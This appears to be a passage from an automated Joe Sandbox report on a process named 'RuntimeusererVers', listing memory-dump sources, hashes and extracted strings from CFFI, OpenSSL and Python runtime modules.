                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0451F136A19F02C2EA188B25ED641B873A0FF88BE1F580635DA4E47760EF7DF5958310
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • implicit cast to 'char *' from a different pointer type: will be forbidden in the future (check that the types are as you expect; use an explicit ffi.cast() if they are correct), xrefs: 00007FF81E5045A5
                                                                                                                                                                                                                                          • write_raw_integer_data: bad integer size, xrefs: 00007FF81E50473D
                                                                                                                                                                                                                                          • pointer or array, xrefs: 00007FF81E504602
                                                                                                                                                                                                                                          • pointer to same type, xrefs: 00007FF81E504619
                                                                                                                                                                                                                                          • write_raw_integer_data, xrefs: 00007FF81E504744
                                                                                                                                                                                                                                          • implicit cast from 'char *' to a different pointer type: will be forbidden in the future (check that the types are as you expect; use an explicit ffi.cast() if they are correct), xrefs: 00007FF81E5045AC
                                                                                                                                                                                                                                          • convert_from_object: '%s', xrefs: 00007FF81E504956
                                                                                                                                                                                                                                          • cdata pointer, xrefs: 00007FF81E504558
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: cdata pointer$convert_from_object: '%s'$implicit cast from 'char *' to a different pointer type: will be forbidden in the future (check that the types are as you expect; use an explicit ffi.cast() if they are correct)$implicit cast to 'char *' from a different pointer type: will be forbidden in the future (check that the types are as you expect; use an explicit ffi.cast() if they are correct)$pointer or array$pointer to same type$write_raw_integer_data$write_raw_integer_data: bad integer size
                                                                                                                                                                                                                                          • API String ID: 0-1884834070
                                                                                                                                                                                                                                          • Opcode ID: e7bdf1df732a0f7463d4ad8f6c75a7785ed1cc8f59bb040112b8e12e18ee6264
                                                                                                                                                                                                                                          • Instruction ID: cfd7ce9868353ecd762c3f2a8dc116cbe9648a2ae57daf9430309ff80f12656f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7bdf1df732a0f7463d4ad8f6c75a7785ed1cc8f59bb040112b8e12e18ee6264
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5D14331E09E53C6EA659B15EC701F92BA0AF95BF4F444B31EA4E466E1EF2CF8458300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: X_ctrl$X_free$D_sizeR_put_errorX_new_idY_derive_init
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\tls13_enc.c$U$W$tls13
                                                                                                                                                                                                                                          • API String ID: 2176224248-2595563013
                                                                                                                                                                                                                                          • Opcode ID: 7025e5d67e21c680d55085412324220ae3acebaa8e34da1c22efe020185f10cc
                                                                                                                                                                                                                                          • Instruction ID: 27c61044f11dfed1be83d369803b079c26aa35fb7e0752c604ed7a84f51fc5e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7025e5d67e21c680d55085412324220ae3acebaa8e34da1c22efe020185f10cc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42918032B08A8681FE24DA11E850BBA6790FF947E4F540235EE4D47A95EF3DF946CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Arg_Err_ParseSizeStringTuple_
                                                                                                                                                                                                                                          • String ID: enumerators must be a list of strings$expected a primitive signed or unsigned base type$sO!O!O!:new_enum_type$tuple args must have the same size
                                                                                                                                                                                                                                          • API String ID: 4247878537-3833221460
                                                                                                                                                                                                                                          • Opcode ID: 334b8c6b44c7f9c489d70ad3da4a5abaf241093b265d4545a265c06aab572ffe
                                                                                                                                                                                                                                          • Instruction ID: f0eb38da840a2ae8f41fa353cdaaea7d34974a8c08ca2fadc55398dd4cc5ede2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 334b8c6b44c7f9c489d70ad3da4a5abaf241093b265d4545a265c06aab572ffe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF810736A08F86C2EB648F25E8A43A977A1FB89BE4F454235DA5E43754DF3DE448C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: SizeStringTuple_$Arg_DeallocDict_Err_FromItemParseUnicode_
                                                                                                                                                                                                                                          • String ID: O!s$addressof() expects at least 1 argument$cannot take the address of the constant '%.200s'$expected a cdata struct/union/array object$expected a cdata struct/union/array/pointer object
                                                                                                                                                                                                                                          • API String ID: 3853558574-3015567189
                                                                                                                                                                                                                                          • Opcode ID: 8d6ba13cabf9bcecd3834abdb23ab07171b206e85454cef75291e75bc6c4f8b6
                                                                                                                                                                                                                                          • Instruction ID: c8b14e2bfd240b6dbce3c4ab452a2a28a89dbd82bf5c6b6f33bf4732bdc6464e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d6ba13cabf9bcecd3834abdb23ab07171b206e85454cef75291e75bc6c4f8b6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11A12A22B09F0282EE649B15ED602F9A3A1AF99BF4F480631DE0E47795EF7DF4458700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_FormatObject_
                                                                                                                                                                                                                                          • String ID: cdata '%s' is opaque$convert_to_object: '%s'$got a _Bool of value %d, expected 0 or 1$read_raw_complex_data$read_raw_complex_data: bad complex size$read_raw_signed_data$read_raw_signed_data: bad integer size$read_raw_unsigned_data$read_raw_unsigned_data: bad integer size
                                                                                                                                                                                                                                          • API String ID: 2473357163-3506759392
                                                                                                                                                                                                                                          • Opcode ID: 717d149b8b9b812c3234bef2861bd46c8bc39162339dacc41a3c0122e051d3d6
                                                                                                                                                                                                                                          • Instruction ID: fed6dca16828d240b848c8490a81638d7c70d9bf0a14019ed07cb246840edb0a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 717d149b8b9b812c3234bef2861bd46c8bc39162339dacc41a3c0122e051d3d6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E49173B2E08E46C1FA198B15E8601B92360FF95BF9F144631EA0E467A5DF2DF596C700
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • It is a struct with bit fields, which libffi does not support, xrefs: 00007FF81E50A5B4
                                                                                                                                                                                                                                          • It is a struct declared with "...;", but the C calling convention may depend on the missing fields; or, it contains anonymous struct/unions, xrefs: 00007FF81E50A50C
                                                                                                                                                                                                                                          • ctype '%s' has incomplete type, xrefs: 00007FF81E50A4A2
                                                                                                                                                                                                                                          • It is a 'packed' structure, with a different layout than expected by libffi, xrefs: 00007FF81E50A51E
                                                                                                                                                                                                                                          • ctype '%s' not supported as %s by libffi. Unions are only supported as %s if the function is 'API mode' and non-variadic (i.e. declared inside ffibuilder.cdef()+ffibuilder.set_source() and not taking a final '...' argument), xrefs: 00007FF81E50A6D7
                                                                                                                                                                                                                                          • argument, xrefs: 00007FF81E50A437
                                                                                                                                                                                                                                          • ctype '%s' not supported as %s. %s. Such structs are only supported as %s if the function is 'API mode' and non-variadic (i.e. declared inside ffibuilder.cdef()+ffibuilder.set_source() and not taking a final '...' argument), xrefs: 00007FF81E50A5CB
                                                                                                                                                                                                                                          • (the support for complex types inside libffi is mostly missing at this point, so CFFI only supports complex types as arguments or return value in API-mode functions), xrefs: 00007FF81E50A705
                                                                                                                                                                                                                                          • ctype '%s' (size %zd) not supported as %s%s, xrefs: 00007FF81E50A710
                                                                                                                                                                                                                                          • It is a struct with a zero-length array, which libffi does not support, xrefs: 00007FF81E50A5AB
                                                                                                                                                                                                                                          • return value, xrefs: 00007FF81E50A430
                                                                                                                                                                                                                                          • ctype '%s' has size 0, xrefs: 00007FF81E50A4A9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (the support for complex types inside libffi is mostly missing at this point, so CFFI only supports complex types as arguments or return value in API-mode functions)$It is a 'packed' structure, with a different layout than expected by libffi$It is a struct declared with "...;", but the C calling convention may depend on the missing fields; or, it contains anonymous struct/unions$It is a struct with a zero-length array, which libffi does not support$It is a struct with bit fields, which libffi does not support$argument$ctype '%s' (size %zd) not supported as %s%s$ctype '%s' has incomplete type$ctype '%s' has size 0$ctype '%s' not supported as %s by libffi. Unions are only supported as %s if the function is 'API mode' and non-variadic (i.e. declared inside ffibuilder.cdef()+ffibuilder.set_source() and not taking a final '...' argument)$ctype '%s' not supported as %s. %s. Such structs are only supported as %s if the function is 'API mode' and non-variadic (i.e. declared inside ffibuilder.cdef()+ffibuilder.set_source() and not taking a final '...' argument)$return value
                                                                                                                                                                                                                                          • API String ID: 0-3203576518
                                                                                                                                                                                                                                          • Opcode ID: b1373cbc9f03adf1288039238c1e4e1bba7fa90f622b423d7f262d60f8a62690
                                                                                                                                                                                                                                          • Instruction ID: 8ff6634db2658a1da89ad319dfa9e16adc060a2a62d73665f60da924afbc7b51
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1373cbc9f03adf1288039238c1e4e1bba7fa90f622b423d7f262d60f8a62690
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D914832A09E42C5EA54CF15E8646B927A4FB84BE8F454236EE4D877A1EF3CF495C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Eval_FetchState_Thread_errno$EnsureErrnoFilenameFromL_get_ex_dataO_ctrlO_printfObjectReleaseRestoreSaveStringThread_acquire_lockThread_allocate_lockThread_release_lockWith
                                                                                                                                                                                                                                          • String ID: %s$Unable to allocate lock
                                                                                                                                                                                                                                          • API String ID: 2873158514-852672932
                                                                                                                                                                                                                                          • Opcode ID: f91797b022f00b35e9185e579c68ffe8f00f61b90fd895f074716c2cc15eadb7
                                                                                                                                                                                                                                          • Instruction ID: 55e49791c69b502f190b77af661f450f75c48f099c1892ebd12a0c99a467b5b5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f91797b022f00b35e9185e579c68ffe8f00f61b90fd895f074716c2cc15eadb7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A41C875A08E4682FB509B65E8542697761FB89BF6F814231CA4F43B64DF7CF499C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Buffer_Release$BufferDigestErr_Eval_Object_StringThreadUpdate$CheckRestoreSaveThread_acquire_lockThread_allocate_lockThread_release_lock
                                                                                                                                                                                                                                          • String ID: Buffer must be single dimension$Strings must be encoded before hashing$object supporting the buffer API required
                                                                                                                                                                                                                                          • API String ID: 3566613315-2943709887
                                                                                                                                                                                                                                          • Opcode ID: a1547ea42d92a3772ce6650c4cebde31e608418f5351fa5d4bab7438ae3a001c
                                                                                                                                                                                                                                          • Instruction ID: a412af48bc50678f6e2c10b5b371d8db98b858022241a1afc604087ffc944732
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1547ea42d92a3772ce6650c4cebde31e608418f5351fa5d4bab7438ae3a001c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52512865A08E4386E760CB25E848A7963A1FB84FF4F544631DD5E47BA4DE3CF8A5C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566347608.00007FF81DC71000.00000020.00000001.01000000.0000004D.sdmp, Offset: 00007FF81DC70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566298623.00007FF81DC70000.00000002.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566383557.00007FF81DC73000.00000002.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566435114.00007FF81DC75000.00000004.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566474761.00007FF81DC76000.00000002.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc70000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Eval_ThreadThread_acquire_lock_timedTime_$CallsDeadline_FromMakeMicrosecondsModuleNoneObjectPendingRestoreSaveSecondsStringThread_release_lockType_
                                                                                                                                                                                                                                          • String ID: 'timeout' must be a non-negative number$timeout value is too large
                                                                                                                                                                                                                                          • API String ID: 1143863106-4256478105
                                                                                                                                                                                                                                          • Opcode ID: 4ec1b1fa42c07ad777bce140c811d275ad25926547c9346e609a1a1f99469cc7
                                                                                                                                                                                                                                          • Instruction ID: ec9926ca36808e5b50160abb8129adefff7e6d17b7e5828bce15f13e680f48b6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ec1b1fa42c07ad777bce140c811d275ad25926547c9346e609a1a1f99469cc7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31511526A08E5692EB119B11D9953396361FB88BF0F404B31CE5FCBB94EF3CE4568741
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dict_$Module_$FromItemObject$DeallocStringUnicode_$BuildLongLong_SizeStateValue_
                                                                                                                                                                                                                                          • String ID: err_codes_to_names$err_names_to_codes$lib_codes_to_names
                                                                                                                                                                                                                                          • API String ID: 3638348250-3898622116
                                                                                                                                                                                                                                          • Opcode ID: 9c40e612007d979e86af836558dfbe017010d0c2d7bd102fcad4e2c260463dcc
                                                                                                                                                                                                                                          • Instruction ID: 13f153711bbb16721b81d67b415ce8454335fd276d647809b192187970124e30
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c40e612007d979e86af836558dfbe017010d0c2d7bd102fcad4e2c260463dcc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B410025A0AF4781FB158F25A80826873E0BF49BF6F884234DA4D57B94EF3CF5918340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Dealloc$FetchRestoreUnicode_$ArgsCallClearFormatFromFunctionObject_UnraisableWrite
                                                                                                                                                                                                                                          • String ID: %c%s%R%s$%c%s%s$rom callback for ffi.gc
                                                                                                                                                                                                                                          • API String ID: 2923111776-761869168
                                                                                                                                                                                                                                          • Opcode ID: 02cc20475e2eb133c95a1aae833ee4b95de07a25b4740ac56dfd03478cfc7d87
                                                                                                                                                                                                                                          • Instruction ID: 72273d5a6fcd543926080be75349bd0e1f18257ab115bb00e16f61c2bcc63cc1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02cc20475e2eb133c95a1aae833ee4b95de07a25b4740ac56dfd03478cfc7d87
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6410A36A09E42C2EA689B51EC642FD63A1FB85BE4F044231DA8E07B24DF7DF5498740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DigestX_mdX_new$D_sizeD_typeFinal_exO_ctrlO_freeUpdateX_copy_exX_ctrlX_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\s3_enc.c
                                                                                                                                                                                                                                          • API String ID: 485953282-1839494539
                                                                                                                                                                                                                                          • Opcode ID: ef17e9a45c90a4201180d711f444119ed43c2813af601f3ad1389d32d129b891
                                                                                                                                                                                                                                          • Instruction ID: 018f417cb1bc685c7cc666bf90d4a3073df19228a3d5c92d90429d23d82248c9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef17e9a45c90a4201180d711f444119ed43c2813af601f3ad1389d32d129b891
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE616B72B08E8685EE609E16D4907BA67A0FF85BE8F054231EE4D4B795DF2CF4868701
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BufferBuffer_Err_Eval_Object_ReleaseStringThreadUpdate$CheckRestoreSaveThread_acquire_lockThread_allocate_lockThread_release_lock
                                                                                                                                                                                                                                          • String ID: Buffer must be single dimension$Strings must be encoded before hashing$object supporting the buffer API required
                                                                                                                                                                                                                                          • API String ID: 2508703043-2943709887
                                                                                                                                                                                                                                          • Opcode ID: 029dc63bcb9701883aa7dfe738467c79b7938d4d54130a062ddd87817df6c006
